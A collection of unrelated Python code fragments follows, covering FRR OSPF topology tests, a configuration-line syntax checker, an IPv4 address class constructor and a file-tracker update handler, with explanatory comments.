"DROther"}, } } } } dut = "r1" result = verify_ospf_neighbor(tgen, topo, dut, input_dict, lan=True) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step("Reconfigure the original router id and clear ip ospf interface.") change_rid = {"r0": {"ospf": {"router_id": "100.1.1.0"}}} result = create_router_ospf(tgen, topo, change_rid) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) topo["routers"]["r0"]["ospf"]["router_id"] = "100.1.1.0" step("Reload the FRR router") # stop/start -> restart FRR router and verify stop_router(tgen, "r0") start_router(tgen, "r0") step("Verify that OSPF is enabled with router id previously configured.") input_dict = { "r1": { "ospf": { "neighbors": { "r0": {"state": "Full", "role": "Backup"}, "r2": {"state": "Full", "role": "DROther"}, "r3": {"state": "Full", "role": "DROther"}, } } } } dut = "r1" result = verify_ospf_neighbor(tgen, topo, dut, input_dict, lan=True) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) write_test_footer(tc_name)
def check_line(line: str, config_keywords: dict) -> int: """Syntax checking single configuration line""" words = line.split() keyword = words[0] # Check if keyword is valid if keyword not in config_keywords: raise (BaseException(f"ERROR: Unknown keyword '{keyword}'")) # Check number of mandatory arguments if len(words) <= config_keywords[keyword].len: raise (BaseException( f"ERROR: Invalid number of arguments for keyword '{keyword}'")) # Array with type for each argument arg_types = config_keywords[keyword].types # Check type for every argument value for i, word in enumerate(words[1:], start=1): if not arg_types: raise (BaseException( f"ERROR: Keyword '{keyword}' takes no arguments")) if i > len(arg_types): raise (BaseException( f"ERROR: Invalid optional argument for keyword '{keyword}'")) # Current argument type arg_type = arg_types[i - 1] # Unprintable characters may also be ASCII characters if not word.isprintable(): raise (BaseException( f"ERROR: Invalid characters in value for keyword '{keyword}'")) if arg_type == ArgTye.STRING: try: val_string = line.split(maxsplit=1)[1] if not val_string.startswith('"') or not val_string.endswith('"')\ or len(val_string) < 3 or val_string.find('"', 1, -1) >= 0: raise (BaseException( f"ERROR: Invalid string format for keyword '{keyword}'" )) return 1 except IndexError: raise (BaseException( f"ERROR: Missing string argument for keyword '{keyword}'")) elif arg_type == ArgTye.ROUTE: # TODO return 0 elif arg_type == ArgTye.IPNET: try: IPv4Network(f"{words[i]}/{words[i+1]}") except IndexError: raise (BaseException( f"ERROR: Missing IP network address part for keyword '{keyword}'" )) except ValueError: raise (BaseException( f"ERROR: Invalid IP network address for keyword '{keyword}'" )) elif arg_type == ArgTye.INT: if not word.isnumeric(): raise (BaseException( f"ERROR: Invalid integer value '{word}' for keyword '{keyword}'" )) elif arg_type == ArgTye.ASCII: try: word.encode("ascii") except UnicodeEncodeError: raise (BaseException( f"ERROR: Invalid ascii value '{word}' for keyword '{keyword}'" )) elif arg_type == ArgTye.ENUM: if not config_keywords[keyword].vals: raise (BaseException( f"ERROR: No enumeration values defined for keyword '{keyword}'" )) for val_enum in config_keywords[keyword].vals[i - 1]: regex = re.compile("^" + val_enum + "$") if regex.match(word): break else: raise (BaseException( f"ERROR: Invalid enumeration value '{word}' for keyword '{keyword}'" )) elif arg_type == ArgTye.IPADDR: try: ip_address = IPv4Address(word) except AddressValueError: raise (BaseException( f"ERROR: Invalid IP address '{word}' for keyword '{keyword}'" )) return 0
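# A hypothetical harness for check_line(), inferred from the attribute
# accesses above (.len for the minimum argument count, .types for per-argument
# ArgTye members, .vals for per-argument enum patterns). It assumes check_line,
# the module's ArgTye enum and its ipaddress/re imports are already in scope;
# the keyword names and specs below are made up for illustration only.
from collections import namedtuple

KeywordSpec = namedtuple("KeywordSpec", ["len", "types", "vals"])

config_keywords = {
    "gateway": KeywordSpec(1, [ArgTye.IPADDR], None),  # gateway <ipv4-address>
    "mtu": KeywordSpec(1, [ArgTye.INT], None),         # mtu <integer>
}

check_line("gateway 192.0.2.1", config_keywords)  # passes, returns 0
check_line("mtu 1500", config_keywords)           # passes, returns 0
# check_line("gateway 192.0.2.999", config_keywords) would raise BaseException
# with "Invalid IP address ..." via the IPADDR branch above.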
def test_ospf_lan_tc2_p0(request): """ OSPF IFSM -Verify state change events on DR / BDR / DR Other """ tc_name = request.node.name write_test_header(tc_name) tgen = get_topogen() # Don't run this test if we have any failure. if tgen.routers_have_failure(): pytest.skip(tgen.errors) global topo step("Bring up the base config as per the topology") reset_config_on_routers(tgen) step( "Verify that OSPF is subscribed to multi cast services " "(All SPF, all DR Routers)." ) step("Verify that interface is enabled in ospf.") dut = "r0" input_dict = { "r0": { "links": { "s1": { "ospf": { "priority": 98, "timerDeadSecs": 4, "area": "0.0.0.3", "mcastMemberOspfDesignatedRouters": True, "mcastMemberOspfAllRouters": True, "ospfEnabled": True, } } } } } result = verify_ospf_interface(tgen, topo, dut=dut, input_dict=input_dict) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step("Delete the ip address") topo1 = { "r0": { "links": { "r3": { "ipv4": topo["routers"]["r0"]["links"]["s1"]["ipv4"], "interface": topo["routers"]["r0"]["links"]["s1"]["interface"], "delete": True, } } } } result = create_interfaces_cfg(tgen, topo1) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step("Change the ip on the R0 interface") topo_modify_change_ip = deepcopy(topo) intf_ip = topo_modify_change_ip["routers"]["r0"]["links"]["s1"]["ipv4"] topo_modify_change_ip["routers"]["r0"]["links"]["s1"]["ipv4"] = str( IPv4Address(unicode(intf_ip.split("/")[0])) + 3 ) + "/{}".format(intf_ip.split("/")[1]) build_config_from_json(tgen, topo_modify_change_ip, save_bkup=False) step("Verify that interface is enabled in ospf.") dut = "r0" input_dict = { "r0": { "links": { "s1": { "ospf": { "ipAddress": topo_modify_change_ip["routers"]["r0"]["links"][ "s1" ]["ipv4"].split("/")[0], "ipAddressPrefixlen": int( topo_modify_change_ip["routers"]["r0"]["links"]["s1"][ "ipv4" ].split("/")[1] ), } } } } } result = verify_ospf_interface(tgen, topo, dut=dut, input_dict=input_dict) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step("Modify the mask on the R0 interface") ip_addr = topo_modify_change_ip["routers"]["r0"]["links"]["s1"]["ipv4"] mask = topo_modify_change_ip["routers"]["r0"]["links"]["s1"]["ipv4"] step("Delete the ip address") topo1 = { "r0": { "links": { "r3": { "ipv4": ip_addr, "interface": topo["routers"]["r0"]["links"]["s1"]["interface"], "delete": True, } } } } result = create_interfaces_cfg(tgen, topo1) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step("Change the ip on the R0 interface") topo_modify_change_ip = deepcopy(topo) intf_ip = topo_modify_change_ip["routers"]["r0"]["links"]["s1"]["ipv4"] topo_modify_change_ip["routers"]["r0"]["links"]["s1"]["ipv4"] = str( IPv4Address(unicode(intf_ip.split("/")[0])) + 3 ) + "/{}".format(int(intf_ip.split("/")[1]) + 1) build_config_from_json(tgen, topo_modify_change_ip, save_bkup=False) step("Verify that interface is enabled in ospf.") dut = "r0" input_dict = { "r0": { "links": { "s1": { "ospf": { "ipAddress": topo_modify_change_ip["routers"]["r0"]["links"][ "s1" ]["ipv4"].split("/")[0], "ipAddressPrefixlen": int( topo_modify_change_ip["routers"]["r0"]["links"]["s1"][ "ipv4" ].split("/")[1] ), } } } } } result = verify_ospf_interface(tgen, topo, dut=dut, input_dict=input_dict) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) step("Change the area id on the interface") input_dict = { "r0": { "links": { "s1": { "interface": 
topo["routers"]["r0"]["links"]["s1"]["interface"], "ospf": {"area": "0.0.0.3"}, "delete": True, } } } } result = create_interfaces_cfg(tgen, input_dict) assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result) input_dict = { "r0": { "links": { "s1": { "interface": topo["routers"]["r0"]["links"]["s1"]["interface"], "ospf": {"area": "0.0.0.2"}, } } } } result = create_interfaces_cfg(tgen, input_dict) assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result) step("Verify that interface is enabled in ospf.") dut = "r0" input_dict = { "r0": {"links": {"s1": {"ospf": {"area": "0.0.0.2", "ospfEnabled": True}}}} } result = verify_ospf_interface(tgen, topo, dut=dut, input_dict=input_dict) assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result) write_test_footer(tc_name)
def __init__(self, if_name):
    IPv4Address.__init__(self, 0)
    AutoAddress.__init__(self, if_name)
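# The constructor fragment above appears to belong to a class that inherits
# from both IPv4Address and an AutoAddress mixin, seeding the address part
# with 0 (0.0.0.0) before the mixin binds the interface name. A minimal
# self-contained sketch under that assumption; AutoAddress and
# InterfaceAddress here are hypothetical stand-ins, not the original classes.
from ipaddress import IPv4Address

class AutoAddress:
    def __init__(self, if_name):
        # A real mixin would resolve the interface name to an address here.
        self.if_name = if_name

class InterfaceAddress(IPv4Address, AutoAddress):
    def __init__(self, if_name):
        IPv4Address.__init__(self, 0)        # placeholder address 0.0.0.0
        AutoAddress.__init__(self, if_name)  # record the interface name

addr = InterfaceAddress("eth0")
print(addr, addr.if_name)  # 0.0.0.0 eth0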
def api_updatetracker(self, fname, start_bytes, end_bytes, ip, port): """Implements the updatetracker API command. All arguments are expected to be strings, but *start_bytes*, *end_bytes*, and *port* should be castable to :class:`int` and *ip* should be castable to :class:`~ipaddress.IPv4Address`. """ fname = str(fname) try: start_bytes, end_bytes, port = map(int, (start_bytes, end_bytes, port)) except ValueError: print("Either start_bytes ({!r}), end_bytes ({!r}), or port ({!r})"\ " is not a valid integer".format(start_bytes,end_bytes,port)) self.request.sendall(b"<updatetracker fail>") return try: ip = IPv4Address(ip) except AddressValueError: print("Malformed IP Address: {!r}".format(ip)) self.request.sendall(b"<updatetracker fail>") return tfname = "{}.track".format(fname) tfpath = os.path.join(self.server.torrents_dir, tfname) #check if .track file exists if not os.path.exists(tfpath): print("Can't update tracker file, doesn't exist") self.request.sendall(b"<updatetracker ferr>") return #create trackerfile from existing tracker try: tf = trackerfile.trackerfile.fromPath(tfpath) except Exception as err: print(err) self.request.sendall(b"<updatetracker fail>") return #clean trackerfile tf.clean() #add peer peer try: tf.updatePeer(ip, port, start_bytes, end_bytes) except Exception as err: print(err) self.request.sendall(b"<updatetracker fail>") return print("Added {} (creator) to trackerfile".format(ip)) #write tracker to file with open(tfpath, 'w') as fl: fcntl.lockf(fl, fcntl.LOCK_EX) tf.writeTo(fl) fcntl.lockf(fl, fcntl.LOCK_UN) print("Wrote trackerfile to disk.") self.request.sendall(b"<updatetracker succ>") return
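# Illustrative outcomes for the handler above, following its own response
# strings; the handler instance, request socket, torrents directory and
# trackerfile module are assumed to exist, and the argument values are
# examples only:
#
#   handler.api_updatetracker("file.dat", "0", "1023", "10.0.0.5", "7000")
#       -> b"<updatetracker succ>" once file.dat.track exists and the peer
#          entry has been written back to disk
#   handler.api_updatetracker("file.dat", "0", "1023", "300.1.1.1", "7000")
#       -> AddressValueError is caught; replies b"<updatetracker fail>"
#   handler.api_updatetracker("missing.dat", "0", "1023", "10.0.0.5", "7000")
#       -> b"<updatetracker ferr>" because missing.dat.track does not exist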